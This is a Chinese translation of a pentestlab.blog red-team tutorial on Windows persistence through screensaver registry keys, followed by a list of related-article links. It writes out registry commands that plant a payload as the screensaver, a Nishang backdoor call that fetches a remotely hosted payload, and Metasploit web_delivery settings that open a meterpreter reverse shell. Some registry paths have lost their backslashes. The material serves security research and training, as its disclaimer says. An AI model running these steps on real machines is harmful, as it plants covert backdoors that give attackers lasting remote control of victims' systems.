Window权限维持(五):屏幕保护程序
2023-09-14 09:11:46 时间
Window权限维持(五):屏幕保护程序
屏幕保护是Windows功能的一部分,使用户可以在一段时间不活动后放置屏幕消息或图形动画。众所周知,Windows的此功能被威胁参与者滥用为持久性方法。这是因为屏幕保护程序是具有.scr文件扩展名的可执行文件,并通过scrnsave.scr实用程序执行。
屏幕保护程序设置存储在注册表中,从令人反感的角度来看,最有价值的值是:
HKEY_CURRENT_USERControl PanelDesktopSCRNSAVE.EXE
HKEY_CURRENT_USERControl PanelDesktopScreenSaveActive
HKEY_CURRENT_USERControl PanelDesktopScreenSaverIsSecure
HKEY_CURRENT_USERControl PanelDesktopScreenSaveTimeOut
屏幕保护程序–注册表项
可以通过命令提示符或从PowerShell控制台修改或添加注册表项。由于.scr文件本质上是可执行文件,因此两个扩展名都可以用于后门植入。
reg add "hkcucontrol paneldesktop" /v SCRNSAVE.EXE /d c:tmppentestlab.exe
reg add "hkcucontrol paneldesktop" /v SCRNSAVE.EXE /d c:tmppentestlab.scr
New-ItemProperty -Path 'HKCU:Control PanelDesktop' -Name 'SCRNSAVE.EXE' -Value 'c:tmppentestlab.exe'
New-ItemProperty -Path 'HKCU:Control PanelDesktop' -Name 'SCRNSAVE.EXE' -Value 'c:tmppentestlab.scr'
添加注册表项– CMD和PowerShell
一旦机器不活动时间段过去,将执行任意有效载荷,并且将再次建立命令和控制的通信。
屏幕保护程序– Meterpreter
Nishang框架包含一个PowerShell脚本,该脚本也可以执行此攻击,但与上述方法相比,它需要管理级别的特权,因为它在本地计算机中使用注册表项来存储将执行远程托管有效负载的PowerShell命令。这种技术的好处是它不会接触磁盘。
Import-Module .Add-ScrnSaveBackdoor.ps1
Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.145:8080/Bebr7aOemwFJO
Nishang –屏幕保护程序后门
在这种情况下,可以使用Metasploit Web交付模块生成并托管PowerShell负载。一旦用户会话变为空闲,屏幕保护程序将执行PowerShell负载,然后将打开一个meterpreter会话。
use exploit/multi/script/web_delivery
set payload windows/x64/meterpreter/reverse_tcp
set LHOST IP_Address
set target 2exploit
Meterpreter –屏幕保护程序
利用屏幕保护程序的持久性技术的问题在于,当用户返回并且系统未处于空闲模式时,会话将中断。但是,红队可以在用户不在时执行其操作。如果屏幕保护程序被组策略禁用,则该技术不能用于持久性。
译文声明:本文由Bypass整理并翻译,仅用于安全研究和学习之用。 原文地址:https://pentestlab.blog/2019/10/09/persistence-screensaver/
本文作者:Bypass007
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/119993.html
相关文章
- [Android Security] APK自我保护 - DEX/APK校验
- 保护主题不受更改
- 启动屏幕保护程序
- 大数据时代个人隐私权保护机制构建与完善
- 【反传销】传销故事总结—如何尽可能保护自身和家人安全
- 一个能够保护个人收藏夹隐私的Chrome扩展
- 高级端点保护 (AEP) 简介
- exew文件加密:利用破解版exe文件加密器对exe文件进行加密保护(图文教程)
- 【Linux 内核 内存管理】优化内存屏障 ③ ( 编译器屏障 | 禁止 / 开启内核抢占 与 方法保护临界区 | preempt_disable 禁止内核抢占源码 | 开启内核抢占源码 )
- C++头文件保护符和变量的声明定义
- 程序猿颈椎保护指南
- 内存完整性理解——当启用“内存完整性”时,程序由核心隔离创建的hypervisor保护的容器中运行,这将使恶意软件几乎不可能篡改代码完整性检查并访问Windows内核!就是虚拟化执行嘛!
- 第三代电力电子半导体:SiC MOSFET学习笔记(四)SiC MOSFET传统驱动电路保护
- USB Type-C 电力传输电路设计-主机端Type-C保护方案